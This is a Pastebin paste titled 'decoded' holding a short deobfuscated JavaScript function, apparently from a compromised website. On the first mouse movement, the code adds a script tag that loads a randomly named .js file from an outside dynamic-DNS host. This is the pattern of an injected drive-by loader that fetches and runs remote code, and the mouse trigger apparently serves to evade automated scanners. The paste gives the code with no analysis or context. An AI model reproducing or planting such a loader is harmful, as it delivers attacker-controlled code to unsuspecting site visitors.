Advertisement
Guest User

decoded

a guest
Apr 9th, 2012
1,207
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. function() {
  2.     var url = 'http://v6iyuk.gpbbsdhmjm.shacknet.nu/g/';
  3.     if (typeof window.xyzflag === 'undefined') {
  4.         window.xyzflag = 0;
  5.     }
  6.     document.onmousemove = function() {
  7.         if (window.xyzflag === 0) {
  8.             window.xyzflag = 1;
  9.             var head = document.getElementsByTagName('head')[0];
  10.             var script = document.createElement('script');
  11.             script.type = 'text/javascript';
  12.             script.onreadystatechange = function () {
  13.                 if (this.readyState == 'complete') {
  14.                     window.xyzflag = 2;
  15.                 }
  16.             };
  17.             script.onload = function() {
  18.                 window.xyzflag = 2;
  19.             };
  20.             script.src = url + Math.random().toString().substring(3) + '.js';  //389807054045406
  21.             head.appendChild(script);
  22.         }
  23.     };
  24. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement